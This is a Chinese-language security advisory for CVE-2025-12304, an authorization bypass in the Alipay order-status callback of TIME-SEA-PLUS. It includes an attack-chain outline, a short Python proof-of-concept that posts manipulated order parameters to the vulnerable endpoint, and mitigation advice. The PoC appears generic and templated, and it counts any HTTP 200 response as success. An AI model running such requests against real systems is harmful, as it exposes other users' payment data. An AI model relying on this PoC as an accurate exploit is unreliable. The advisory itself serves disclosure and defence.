CVE-2025-12304: TIME-SEA-PLUS 订单状态处理器权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-12304

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

dulaiduwang003 TIME-SEA-PLUS

漏洞概述

CVE-2025-12304是dulaiduwang003开发的TIME-SEA-PLUS系统中存在的一个中等严重性安全漏洞。该漏洞位于PayController.java文件的alipayIsSucceed函数中，属于订单状态处理器（Order Status Handler）组件。攻击者可以通过操纵该函数的输入参数，绕过正常的授权检查机制，获取未经授权的访问权限。由于该漏洞可通过网络远程利用，且不需要用户交互，因此具有较高的实际威胁性。TIME-SEA-PLUS是一款应用广泛的时间管理和项目管理工具，此次漏洞可能影响大量使用该系统的企业和个人用户。漏洞利用代码已被公开披露，攻击者可以轻松获取相关技术细节并实施攻击。建议受影响的用户立即采取修复措施，避免遭受潜在的安全威胁。

技术细节

该漏洞存在于TIME-SEA-PLUS系统的订单状态处理模块中，具体位于PayController.java文件的alipayIsSucceed函数。攻击者通过构造特殊的请求参数，利用订单状态处理器中的授权验证缺陷，实现对敏感操作的未授权访问。该函数在处理支付宝支付状态回调时，未正确验证请求者的身份和权限，允许低权限用户或未认证用户查看或操作他人的订单状态信息。漏洞的CVSS评分为4.3（中等），攻击向量为网络层面（AV:N），攻击复杂度低（AC:L），需要低权限（PR:L），无需用户交互（UI:N）。机密性影响为低（C:L），完整性和可用性无影响（I:N/A:N）。攻击者可以利用此漏洞获取订单敏感信息，包括交易金额、支付状态、用户信息等，进而可能导致数据泄露或进一步的攻击。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统使用的TIME-SEA-PLUS版本，确认是否存在已知漏洞commit fb299162f18498dd9cf17da906886d80a077d53b或更早版本

STEP 2

步骤2

构造攻击请求：攻击者构造针对/pay/alipayIsSucceed端点的恶意HTTP请求，注入操纵的订单参数

STEP 3

步骤3

绕过授权检查：利用PayController.java中alipayIsSucceed函数的授权验证缺陷，以低权限或无需认证状态发送请求

STEP 4

步骤4

获取敏感数据：成功绕过授权后，攻击者获取目标订单的敏感信息，包括支付状态、交易金额、用户数据等

STEP 5

步骤5

数据利用：攻击者利用获取的订单信息进行进一步攻击，如数据售卖、身份冒充或针对性欺诈

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-12304 PoC - TIME-SEA-PLUS Authorization Bypass
# Target: PayController.java alipayIsSucceed function

TARGET_HOST = "http://target-time-sea-plus.com"
VULN_ENDPOINT = f"{TARGET_HOST}/pay/alipayIsSucceed"

def exploit_authorization_bypass():
    """
    Exploit for CVE-2025-12304: Improper Authorization in Order Status Handler
    This PoC demonstrates how an attacker can bypass authorization checks
    to access order status information without proper privileges.
    """
    # Prepare malicious request with manipulated order parameters
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    # Craft payload to exploit alipayIsSucceed function
    payload = {
        'orderId': '123456789',  # Target order ID
        'status': 'manipulated',  # Manipulated status parameter
        'userId': 'attacker_controlled_id'
    }
    
    try:
        # Send exploit request
        response = requests.post(VULN_ENDPOINT, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Exploit Successful!")
            print(f"[+] Response: {json.dumps(result, indent=2)}")
            return True
        else:
            print(f"[-] Exploit Failed - Status Code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    print("CVE-2025-12304 PoC - TIME-SEA-PLUS Authorization Bypass")
    print("=" * 60)
    exploit_authorization_bypass()

影响范围

dulaiduwang003 TIME-SEA-PLUS <= fb299162f18498dd9cf17da906886d80a077d53b

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）禁用或限制/pay/alipayIsSucceed端点的访问，仅允许受信任的IP地址访问；2）实施请求频率限制，防止自动化攻击；3）增加额外的应用层认证和授权检查；4）监控异常订单访问模式，及时发现潜在攻击行为；5）考虑暂时关闭支付宝支付回调功能，待漏洞修复后再启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12304
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12304
3 Details https://www.cvedetails.com/cve/CVE-2025-12304/
4 VulDB https://vuldb.com/cve/CVE-2025-12304
5 Link https://github.com/Hwwg/cve/issues/3
6 Link https://vuldb.com/?ctiid.329976
7 Link https://vuldb.com/?id.329976
8 Link https://vuldb.com/?submit.676283